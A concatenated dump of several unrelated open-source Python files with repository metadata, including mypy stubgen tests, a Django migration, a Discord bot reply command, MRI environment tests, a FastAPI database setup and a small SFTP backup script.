[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: Tuple[int, str]) -> str', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='Tuple[int,str]')],
ret_type='str')])
assert_equal(
infer_sig_from_docstring('\nfunc(x: Tuple[int, Tuple[str, int], str], y: int) -> str',
'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]'),
ArgSig(name='y', type='int')],
ret_type='str')])
assert_equal(infer_sig_from_docstring('\nfunc(x: foo.bar)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='foo.bar')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: list=[1,2,[3,4]])', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='list', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="nasty[")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc[(x: foo.bar, invalid]', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x: invalid::type<with_template>)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type=None)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
def test_infer_sig_from_docstring_duplicate_args(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x, x) -> str\nfunc(x, y) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x'), ArgSig(name='y')],
ret_type='int')])
def test_infer_sig_from_docstring_bad_indentation(self) -> None:
assert_equal(infer_sig_from_docstring("""
x
x
x
""", 'func'), None)
def test_infer_arg_sig_from_anon_docstring(self) -> None:
assert_equal(infer_arg_sig_from_anon_docstring("(*args, **kwargs)"),
[ArgSig(name='*args'), ArgSig(name='**kwargs')])
assert_equal(
infer_arg_sig_from_anon_docstring(
"(x: Tuple[int, Tuple[str, int], str]=(1, ('a', 2), 'y'), y: int=4)"),
[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]', default=True),
ArgSig(name='y', type='int', default=True)])
def test_infer_prop_type_from_docstring(self) -> None:
assert_equal(infer_prop_type_from_docstring('str: A string.'), 'str')
assert_equal(infer_prop_type_from_docstring('Optional[int]: An int.'), 'Optional[int]')
assert_equal(infer_prop_type_from_docstring('Tuple[int, int]: A tuple.'),
'Tuple[int, int]')
assert_equal(infer_prop_type_from_docstring('\nstr: A string.'), None)
def test_infer_sig_from_docstring_square_brackets(self) -> None:
assert infer_sig_from_docstring(
'fetch_row([maxrows, how]) -- Fetches stuff',
'fetch_row',
) == []
def test_remove_misplaced_type_comments_1(self) -> None:
good = """
\u1234
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
def h():
# type: () int
x = 1 # type: int
"""
assert_equal(remove_misplaced_type_comments(good), good)
def test_remove_misplaced_type_comments_2(self) -> None:
bad = """
def f(x):
# type: Callable[[int], int]
pass
# type: "foo"
# type: 'bar'
x = 1
# type: int
"""
bad_fixed = """
def f(x):
pass
x = 1
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_3(self) -> None:
bad = '''
def f(x):
"""docstring"""
# type: (int) -> int
pass
def g(x):
"""docstring
"""
# type: (int) -> int
pass
'''
bad_fixed = '''
def f(x):
"""docstring"""
pass
def g(x):
"""docstring
"""
pass
'''
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_4(self) -> None:
bad = """
def f(x):
'''docstring'''
# type: (int) -> int
pass
def g(x):
'''docstring
'''
# type: (int) -> int
pass
"""
bad_fixed = """
def f(x):
'''docstring'''
pass
def g(x):
'''docstring
'''
pass
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_5(self) -> None:
bad = """
def f(x):
# type: (int, List[Any],
# float, bool) -> int
pass
def g(x):
# type: (int, List[Any])
pass
"""
bad_fixed = """
def f(x):
# float, bool) -> int
pass
def g(x):
pass
"""
assert_equal(remove_misplaced_type_comments(bad), bad_fixed)
def test_remove_misplaced_type_comments_bytes(self) -> None:
original = b"""
\xbf
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
pass
def h():
# type: int
pass
x = 1 # type: int
"""
dest = b"""
\xbf
def f(x): # type: (int) -> int
def g(x):
# type: (int) -> int
pass
def h():
pass
x = 1 # type: int
"""
assert_equal(remove_misplaced_type_comments(original), dest)
def test_common_dir_prefix(self) -> None:
assert common_dir_prefix([]) == '.'
assert common_dir_prefix(['x.pyi']) == '.'
assert common_dir_prefix(['./x.pyi']) == '.'
assert common_dir_prefix(['foo/bar/x.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi',
'foo/bar/y.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi', 'foo/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/x.pyi', 'foo/bar/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/bar/zar/x.pyi', 'foo/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/x.pyi', 'foo/bar/zar/y.pyi']) == 'foo'
assert common_dir_prefix(['foo/bar/zar/x.pyi', 'foo/bar/y.pyi']) == 'foo/bar'
assert common_dir_prefix(['foo/bar/x.pyi', 'foo/bar/zar/y.pyi']) == 'foo/bar'
class StubgenHelpersSuite(unittest.TestCase):
def test_is_blacklisted_path(self) -> None:
assert not is_blacklisted_path('foo/bar.py')
assert not is_blacklisted_path('foo.py')
assert not is_blacklisted_path('foo/xvendor/bar.py')
assert not is_blacklisted_path('foo/vendorx/bar.py')
assert is_blacklisted_path('foo/vendor/bar.py')
assert is_blacklisted_path('foo/vendored/bar.py')
assert is_blacklisted_path('foo/vendored/bar/thing.py')
assert is_blacklisted_path('foo/six.py')
def test_is_non_library_module(self) -> None:
assert not is_non_library_module('foo')
assert not is_non_library_module('foo.bar')
# The following could be test modules, but we are very conservative and
# don't treat them as such since they could plausibly be real modules.
assert not is_non_library_module('foo.bartest')
assert not is_non_library_module('foo.bartests')
assert not is_non_library_module('foo.testbar')
assert is_non_library_module('foo.test')
assert is_non_library_module('foo.test.foo')
assert is_non_library_module('foo.tests')
assert is_non_library_module('foo.tests.foo')
assert is_non_library_module('foo.testing.foo')
assert is_non_library_module('foo.SelfTest.foo')
assert is_non_library_module('foo.test_bar')
assert is_non_library_module('foo.bar_tests')
assert is_non_library_module('foo.testing')
assert is_non_library_module('foo.conftest')
assert is_non_library_module('foo.bar_test_util')
assert is_non_library_module('foo.bar_test_utils')
assert is_non_library_module('foo.bar_test_base')
assert is_non_library_module('foo.setup')
assert is_non_library_module('foo.__main__')
class StubgenPythonSuite(DataSuite):
"""Data-driven end-to-end test cases that generate stub files.
You can use these magic test case name suffixes:
*_semanal
Run semantic analysis (slow as this uses real stubs -- only use
when necessary)
*_import
Import module and perform runtime introspection (in the current
process!)
You can use these magic comments:
# flags: --some-stubgen-option ...
Specify custom stubgen options
# modules: module1 module2 ...
Specify which modules to output (by default only 'main')
"""
required_out_section = True
base_path = '.'
files = ['stubgen.test']
def run_case(self, testcase: DataDrivenTestCase) -> None:
with local_sys_path_set():
self.run_case_inner(testcase)
def run_case_inner(self, testcase: DataDrivenTestCase) -> None:
extra = [] # Extra command-line args
mods = [] # Module names to process
source = '\n'.join(testcase.input)
for file, content in testcase.files + [('./main.py', source)]:
# Strip ./ prefix and .py suffix.
mod = file[2:-3].replace('/', '.')
if mod.endswith('.__init__'):
mod, _, _ = mod.rpartition('.')
mods.append(mod)
if '-p ' not in source:
extra.extend(['-m', mod])
with open(file, 'w') as f:
f.write(content)
options = self.parse_flags(source, extra)
modules = self.parse_modules(source)
out_dir = 'out'
try:
try:
if not testcase.name.endswith('_import'):
options.no_import = True
if not testcase.name.endswith('_semanal'):
options.parse_only = True
generate_stubs(options)
a = [] # type: List[str]
for module in modules:
fnam = module_to_path(out_dir, module)
self.add_file(fnam, a, header=len(modules) > 1)
except CompileError as e:
a = e.messages
assert_string_arrays_equal(testcase.output, a,
'Invalid output ({}, line {})'.format(
testcase.file, testcase.line))
finally:
for mod in mods:
if mod in sys.modules:
del sys.modules[mod]
shutil.rmtree(out_dir)
def parse_flags(self, program_text: str, extra: List[str]) -> Options:
flags = re.search('# flags: (.*)$', program_text, flags=re.MULTILINE)
if flags:
flag_list = flags.group(1).split()
else:
flag_list = []
options = parse_options(flag_list + extra)
if '--verbose' not in flag_list:
options.quiet = True
else:
options.verbose = True
return options
def parse_modules(self, program_text: str) -> List[str]:
modules = re.search('# modules: (.*)$', program_text, flags=re.MULTILINE)
if modules:
return modules.group(1).split()
else:
return ['main']
def add_file(self, path: str, result: List[str], header: bool) -> None:
if not os.path.exists(path):
result.append('<%s was not generated>' % path.replace('\\', '/'))
return
if header:
result.append('# {}'.format(path[4:]))
with open(path, encoding='utf8') as file:
result.extend(file.read().splitlines())
self_arg = ArgSig(name='self')
class StubgencSuite(unittest.TestCase):
"""Unit tests for stub generation from C modules using introspection.
Note that these don't cover a lot!
"""
def test_infer_hash_sig(self) -> None:
assert_equal(infer_method_sig('__hash__'), [self_arg])
def test_infer_getitem_sig(self) -> None:
assert_equal(infer_method_sig('__getitem__'), [self_arg, ArgSig(name='index')])
def test_infer_setitem_sig(self) -> None:
assert_equal(infer_method_sig('__setitem__'),
[self_arg, ArgSig(name='index'), ArgSig(name='object')])
def test_infer_binary_op_sig(self) -> None:
for op in ('eq', 'ne', 'lt', 'le', 'gt', 'ge',
'add', 'radd', 'sub', 'rsub', 'mul', 'rmul'):
assert_equal(infer_method_sig('__%s__' % op), [self_arg, ArgSig(name='other')])
def test_infer_unary_op_sig(self) -> None:
for op in ('neg', 'pos'):
assert_equal(infer_method_sig('__%s__' % op), [self_arg])
def test_generate_c_type_stub_no_crash_for_object(self) -> None:
output = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
imports = [] # type: List[str]
generate_c_type_stub(mod, 'alias', object, output, imports)
assert_equal(imports, [])
assert_equal(output[0], 'class alias:')
def test_generate_c_type_stub_variable_type_annotation(self) -> None:
# This class mimics the stubgen unit test 'testClassVariable'
class TestClassVariableCls:
x = 1
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
generate_c_type_stub(mod, 'C', TestClassVariableCls, output, imports)
assert_equal(imports, [])
assert_equal(output, ['class C:', ' x: Any = ...'])
def test_generate_c_type_inheritance(self) -> None:
class TestClass(KeyError):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module, ')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(KeyError): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_same_module(self) -> None:
class TestBaseClass:
pass
class TestClass(TestBaseClass):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestBaseClass.__module__, '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(TestBaseClass): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_other_module(self) -> None:
import argparse
class TestClass(argparse.Action):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(argparse.Action): ...', ])
assert_equal(imports, ['import argparse'])
def test_generate_c_type_with_docstring(self) -> None:
class TestClass:
def test(self, arg0: str) -> None:
"""
test(self: TestClass, arg0: int)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: int) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_type_with_docstring_empty_default(self) -> None:
class TestClass:
def test(self, arg0: str = "") -> None:
"""
test(self: TestClass, arg0: str = "")
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: str = ...) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_function_other_module_arg(self) -> None:
"""Test that if argument references type from other module, module will be imported."""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(self.__module__, '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: argparse.Action) -> Any: ...'])
assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_arg(self) -> None:
"""Test that if argument references type from same module but using full path, no module
will be imported, and type specification will be striped to local reference.
"""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: Action) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_function_other_module_ret(self) -> None:
"""Test that if return type references type from other module, module will be imported."""
def test(arg0: str) -> None:
"""
test(arg0: str) -> argparse.Action
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(self.__module__, '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: str) -> argparse.Action: ...'])
assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_ret(self) -> None:
"""Test that if return type references type from same module but using full path,
no module will be imported, and type specification will be striped to local reference.
"""
def test(arg0: str) -> None:
"""
test(arg0: str) -> argparse.Action
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: str) -> Action: ...'])
assert_equal(imports, [])
def test_generate_c_property_with_pybind11(self) -> None:
"""Signatures included by PyBind11 inside property.fget are read."""
class TestClass:
def get_attribute(self) -> None:
"""
(self: TestClass) -> str
"""
pass
attribute = property(get_attribute, doc="")
output = [] # type: List[str]
generate_c_property_stub('attribute', TestClass.attribute, output, readonly=True)
assert_equal(output, ['@property', 'def attribute(self) -> str: ...'])
def test_generate_c_type_with_overload_pybind11(self) -> None:
class TestClass:
def __init__(self, arg0: str) -> None:
"""
__init__(*args, **kwargs)
Overloaded function.
1. __init__(self: TestClass, arg0: str) -> None
2. __init__(self: TestClass, arg0: str, arg1: str) -> None
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, '__init__', TestClass.__init__, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, [
'@overload',
'def __init__(self, arg0: str) -> None: ...',
'@overload',
'def __init__(self, arg0: str, arg1: str) -> None: ...',
'@overload',
'def __init__(*args, **kwargs) -> Any: ...'])
assert_equal(set(imports), {'from typing import overload'})
class ArgSigSuite(unittest.TestCase):
def test_repr(self) -> None:
assert_equal(repr(ArgSig(name='asd"dsa')),
"ArgSig(name='asd\"dsa', type=None, default=False)")
assert_equal(repr(ArgSig(name="asd'dsa")),
'ArgSig(name="asd\'dsa", type=None, default=False)')
assert_equal(repr(ArgSig("func", 'str')),
"ArgSig(name='func', type='str', default=False)")
assert_equal(repr(ArgSig("func", 'str', default=True)),
"ArgSig(name='func', type='str', default=True)")
class IsValidTypeSuite(unittest.TestCase):
def test_is_valid_type(self) -> None:
assert is_valid_type('int')
assert is_valid_type('str')
assert is_valid_type('Foo_Bar234')
assert is_valid_type('foo.bar')
assert is_valid_type('List[int]')
assert is_valid_type('Dict[str, int]')
assert is_valid_type('None')
assert not is_valid_type('foo-bar')
assert not is_valid_type('x->y')
assert not is_valid_type('True')
assert not is_valid_type('False')
assert not is_valid_type('x,y')
assert not is_valid_type('x, y')
class ModuleInspectSuite(unittest.TestCase):
def test_python_module(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('inspect')
assert p is not None
assert p.name == 'inspect'
assert p.file
assert p.path is None
assert p.is_c_module is False
assert p.subpackages == []
def test_python_package(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('unittest')
assert p is not None
assert p.name == 'unittest'
assert p.file
assert p.path
assert p.is_c_module is False
assert p.subpackages
assert all(sub.startswith('unittest.') for sub in p.subpackages)
def test_c_module(self) -> None:
with ModuleInspect() as m:
p = m.get_package_properties('_socket')
assert p is not None
assert p.name == '_socket'
assert p.path is None
assert p.is_c_module is True
assert p.subpackages == []
def test_non_existent(self) -> None:
with ModuleInspect() as m:
with self.assertRaises(InspectError) as e:
m.get_package_properties('foobar-non-existent')
assert str(e.exception) == "No module named 'foobar-non-existent'"
def module_to_path(out_dir: str, module: str) -> str:
fnam = os.path.join(out_dir, '{}.pyi'.format(module.replace('.', '/')))
if not os.path.exists(fnam):
alt_fnam = fnam.replace('.pyi', '/__init__.pyi')
if os.path.exists(alt_fnam):
return alt_fnam
return fnam
| [
"[email protected]"
] | |
c423bf6d59f5a31288293453b53fb976b8347c87 | 11d700eb1108e1b40ff9c7ff57f5b25d2fcd4ecc | /myweb/login/migrations/0006_auto_20210426_1439.py | ff14c713c26a15ea84b77942210676fd5faa79f6 | [] | no_license | KoeyNim/Git-Community | 307fbe251c3b9d8f6e1f22629890775e8dd0d336 | aba59983becb796f0d4f7f3e41f4883ac9cad0b7 | refs/heads/master | 2023-04-16T17:54:15.268698 | 2021-04-30T07:37:51 | 2021-04-30T07:37:51 | 325,216,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # Generated by Django 3.1.7 on 2021-04-26 05:39
from django.db import migrations, models
import login.Validators
class Migration(migrations.Migration):
dependencies = [
('login', '0005_auto_20210426_1438'),
]
operations = [
migrations.AlterField(
model_name='user',
name='phone',
field=models.CharField(default='', max_length=11, validators=[login.Validators.PhoneValidate], verbose_name='전화번호'),
),
]
| [
"[email protected]"
] | |
5fa845cfc1438b8852de6c6c9363dca2bcb67aca | 4439df6ac5b8bec2ff643a1ec57fb85073a08a23 | /MoMMI/Modules/worksonmymachinetm.py | fc66475c580925ed53b650be178db71c31cdd588 | [
"MIT"
] | permissive | Wizardcrying/MoMMI | 709fd133a90f9351bcfc5d7e704838c8d283c461 | 30957a55cbe2c077d6b421d3727250299ed10a0d | refs/heads/master | 2020-06-20T17:49:59.953032 | 2016-11-26T13:57:37 | 2016-11-26T13:57:37 | 74,852,412 | 0 | 0 | null | 2016-11-26T21:49:18 | 2016-11-26T21:49:18 | null | UTF-8 | Python | false | false | 395 | py | from ..client import client
from ..commands import always_command
import re
import aiofiles
@always_command(True)
async def worksonmymachine(message):
match = re.search(r"works\s*(for me|((at|on|in)\s*m(y|ine)\s*.*))", message.content, re.IGNORECASE)
if match is None:
return
await client.send_file(message.channel, "/home/pj/MoMMI/Files/worksonmymachine.png")
| [
"[email protected]"
] | |
e0a9b7881060b89d3ac4782a2bfb862c1daaf3e0 | c431e16d3bfb0a709e747134878615ef4552f79a | /tests/fastmri/test_envs.py | ae7476c5a4668a4e4c871ec14765990f1dd3c4a7 | [
"MIT"
] | permissive | odelalleau/active-mri-acquisition | 4939eaad659588148e497ad863844b4613f1a8bf | 90abc1ebdfc56925c4136115c7d8f4c6f208f912 | refs/heads/master | 2023-02-25T04:38:58.045324 | 2021-01-29T17:34:38 | 2021-01-29T17:34:38 | 334,206,247 | 0 | 0 | MIT | 2021-01-29T18:04:17 | 2021-01-29T16:50:28 | Python | UTF-8 | Python | false | false | 4,179 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import pytest # noqa: F401
import activemri.envs.envs as envs
class TestMICCAIEnv:
env = envs.MICCAI2020Env()
def test_miccai_env_batch_content(self):
for i, batch in enumerate(self.env._train_data_handler):
# No check below for batch[1], since it's the mask and will be replaced later
for j in [0, 1, 3, 4, 5]:
assert isinstance(batch[j], list)
assert len(batch[j]) == self.env.num_parallel_episodes
for batch_idx in range(self.env.num_parallel_episodes):
assert isinstance(batch[0][batch_idx], np.ndarray)
assert batch[0][batch_idx].shape == (
640,
368,
2,
) # k-space
assert isinstance(batch[2][batch_idx], np.ndarray)
assert batch[2][batch_idx].shape == (640, 368, 2) # ground truth image
# data.attrs
assert len(batch[3][batch_idx]) == 4
for key in ["norm", "max", "patient_id", "acquisition"]:
assert key in batch[3][batch_idx]
# file name
assert isinstance(batch[4][batch_idx], str)
# slice_id
assert isinstance(batch[5][batch_idx], int)
if i == 10:
break
def test_miccai_reset(self):
obs, _ = self.env.reset()
assert len(obs) == 3
assert "reconstruction" in obs
assert "mask" in obs
assert "extra_outputs" in obs
assert obs["reconstruction"].shape == (
self.env.num_parallel_episodes,
640,
368,
2,
)
assert obs["mask"].shape == (self.env.num_parallel_episodes, 368)
class TestSingleCoilKneeEnv:
env = envs.SingleCoilKneeEnv()
def test_singlecoil_knee_env_batch_content(self):
for i, batch in enumerate(self.env._train_data_handler):
# No check below for batch[1], since it's the mask and will be replaced later
kspace, _, ground_truth, attrs, fname, slice_id = batch
for j in [0, 1, 3, 4, 5]:
assert isinstance(batch[j], list)
assert len(batch[j]) == self.env.num_parallel_episodes
for batch_idx in range(self.env.num_parallel_episodes):
assert isinstance(kspace[batch_idx], np.ndarray)
assert np.all(
np.iscomplex(kspace[batch_idx][np.nonzero(kspace[batch_idx])])
)
assert kspace[batch_idx].shape in [(640, 368), (640, 372)] # k-space
assert isinstance(ground_truth[batch_idx], np.ndarray)
assert not np.any(np.iscomplex(ground_truth[batch_idx]))
assert ground_truth[batch_idx].shape == (320, 320) # ground_truth
# data.attrs
assert len(attrs[batch_idx]) == 8
for key in [
"acquisition",
"max",
"norm",
"patient_id",
"padding_left",
"padding_right",
"encoding_size",
"recon_size",
]:
assert key in attrs[batch_idx]
# file name
assert isinstance(fname[batch_idx], str)
# slice_id
assert isinstance(slice_id[batch_idx], int)
if i == 10:
break
def test_singlecoil_knee_reset(self):
obs, _ = self.env.reset()
assert len(obs) == 3
assert "reconstruction" in obs
assert "mask" in obs
assert "extra_outputs" in obs
assert obs["reconstruction"].shape == (self.env.num_parallel_episodes, 320, 320)
assert obs["mask"].shape in [
(self.env.num_parallel_episodes, 368),
(self.env.num_parallel_episodes, 372),
]
| [
"[email protected]"
] | |
938f201ccda6e3d76066c4ead1b6b853a53fd18d | 7326c2589e6dc250083415d65e28754ea1e9968e | /17_Inheritance_1.py | 14c4ee3ba0eb6d4a42889fa6191f96fb6cc308af | [] | no_license | nanoyslee/Python_Calulator-Login | 23aa1dd2135dafaa43de5c1d9ce12268e18eab19 | 5a4be881c96dd4495d58160f176d1c07283dd8bb | refs/heads/master | 2020-03-28T12:03:32.493326 | 2018-09-27T22:32:23 | 2018-09-27T22:32:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Class1(object):
def method1(self):
return 'm1'
c1 = Class1()
print(c1.method1())
class Class2(object):
def method1(self):
return 'm1'
def method2(self):
return 'm2'
c2 = Class2()
print(c2.method1())
print(c2.method2())
class Class3(Class1):
def method2(self):
return 'm2'
c3 = Class3()
print(c3, c3.method1())
print(c3, c3.method2())
| [
"[email protected]"
] | |
ae185b44883b5e50aa15019ae93c4ab05a147aa7 | 2863d91df18eb2462840466b70339382c79195ff | /String.py | d61c6fde5822b00c418e40342cb9933aef846c5d | [] | no_license | girish3349/OrangeHRMPOM | 2651b9529a58bc91367aa77cc5d97e9f181f1a39 | 1f2df7237db9d30f56bc06b4827cdd0bc45a5efd | refs/heads/master | 2022-12-13T07:23:42.740421 | 2020-09-20T13:17:47 | 2020-09-20T13:17:47 | 297,077,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | fullName = "Gbellamkonda"
var3 = "38.9details like"
print (fullName)
print(var3)
print (var3[-12:])
print (var3.split("details like")) | [
"[email protected]"
] | |
87befa3eef830cbc6a7f0a12aa9dcac32bf9c495 | baaa3a4d6cc9f9e465726ba11647ca9a3e431a7e | /IN1000/Trix 6/løkker_og_prosedyrer.py | 361179363b5e189e21c11724eb82d81781e3d59c | [] | no_license | MehCheniti/Python | 671d430868e1b8eeafabd7ecb1cf6684ab5c6858 | 1e1dc38dc874e03cb248664ff48f3cb2d497c6e5 | refs/heads/master | 2022-05-28T03:05:31.336202 | 2022-03-11T19:55:46 | 2022-03-11T19:55:46 | 206,413,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def skriv_med_trykk(param):
print (param + "!")
i = 0
while i < 5:
inn = input("Gi meg et kraftuttrykk! ")
if (inn.lower() == "nei"):
break
skriv_med_trykk(inn)
| [
"[email protected]"
] | |
7699469afadfdc6c434ad8ec90f34b76384bc63f | eacd408becd79432b0f29f5f68b9d1c1a5623cf8 | /manage.py | 0f0ab42991580189005c267294b0725352847a98 | [] | no_license | fedediaz1234/Margarita | ca1f7b4fbe171a68153dde7d14cbb9a22e78e73c | e05e09ea3e3da3516c25ef1f23049d289d24dcf9 | refs/heads/master | 2020-12-23T15:25:37.886604 | 2017-05-27T01:44:12 | 2017-05-27T01:44:12 | 92,561,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "margarita.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
e4d33d6c45c1787d86533381a8c9f8f4fffc20cd | 66dda4d91cc9979efa4ea07e6abf461e47c04bdf | /database.py | 5b4be0e60d87cdbd5228ec6db4170f97eca7777f | [] | no_license | 0xlearner/FastAPI-Stock-Screener | e69ea15fa23b56eac894ec62a3ff2d8e1d4d1c36 | 09b8936dbbaf28cfdf9c304761ff8ca352c5effb | refs/heads/main | 2023-06-14T22:52:37.350488 | 2021-07-03T13:17:43 | 2021-07-03T13:17:43 | 382,618,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URL = "postgresql+psycopg2://postgres:password@db:5432/stocks_db"
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db():
db = SessionLocal()
try:
yield db
except:
db.close() | [
"[email protected]"
] | |
e6519c8185a748057c68378fbdedde5727fb3be9 | 19a09ec3b59810dfca1d3470414ee51479cc0507 | /code.py | 74259be646b7625d7191de8633e4a9e91cfc550c | [] | no_license | rlavrinenko/backup_with_python | dbf3b019c0d4b3f28844efd29a7a2bbe26c6134b | 487d10c9c109ee333cc7e0df2b248ba5ae23a0c4 | refs/heads/master | 2022-12-01T04:02:20.558495 | 2020-07-28T17:21:41 | 2020-07-28T17:21:41 | 283,279,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | import os, datetime, pyminizip, paramiko
now = datetime.datetime.now()
date=now.strftime("%Y%m%d")
password=now.strftime("P@ssw0rd%Y%m%dpleaseEnter") #Пароль со своей фразой
os.chdir('d:\TMP')
compression_level = 5
pyminizip.compress("d:\TMP\file.xxx", "", "TMP"+ date +".zip", password, compression_level)
zipfile="TMP"+ date +".zip"
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('ip', username="user", password="pass")
sftp = ssh.open_sftp()
localpath = "TMP"+ date +".zip"
remotepath= '/remdir/' +zipfile+''
sftp.put(zipfile, remotepath)
sftp.close()
ssh.close()
os.remove(zipfile) | [
"[email protected]"
] | |
860f068da1da4f29f84e6c9876de48c0f9dfcd68 | f7be1846da14366ca8277dc3edc207766de838f0 | /Codeforces/407d2B.py | 32c1d8dc337f18ce961e89378a05bddfd08f824f | [] | no_license | IsThatYou/Competitive-Programming | d440f9e78f8a982cd60aa8c81833b9e10208b29e | a924ac7087654402c7f7c4b62374c377178061ad | refs/heads/master | 2020-07-19T16:31:32.492635 | 2019-01-27T02:45:21 | 2019-01-27T02:45:21 | 73,759,128 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | b1,q,l,m = [int(i) for i in input().split()]
bad = [int(i) for i in input().split()]
if abs(q) > 1 and b1 != 0:
b2 = b1
count = 0
while abs(b2) <= l:
count += 1
if b2 in bad:
count-=1
b2 *= q
'''
for u in bad:
i = u
while (i%q == 0):
i = i / q
a = i == b1
if a:
break
a = i == b1
if (a and abs(u)<=l) or u == b1:
count-=1
'''
print(count)
else:
'''
if abs(b1)<=l:
if q == 1:
if b1 in bad:
print("0")
else:
print("inf")
elif q == 0:
if 0 in bad:
if b1 in bad:
print("0")
else:
print("1")
else:
print("inf")
elif q == -1:
if (b1 in bad) and (b2 in bad):
print("0")
else:
print("inf")
else:
print("0")
'''
a1 = b1 * q
if abs(b1) <= l:
if b1 == 0:
if b1 in bad:
print("0")
else:
print("inf")
elif a1 in bad:
if b1 in bad:
print("0")
else:
if a1 == 0:
print("1")
else:
print("inf")
else:
print("inf")
else:
print("0") | [
"[email protected]"
] | |
2e847f42310ca02b1e0a0171f8165b72640288c8 | 7d1a1f66ebefe567a83cef342c3d5896e59ddbdf | /PublicServer/supervision/apps.py | 9f2d5cce5a4c587aa6224fafeb75c3b85ced5701 | [
"MIT"
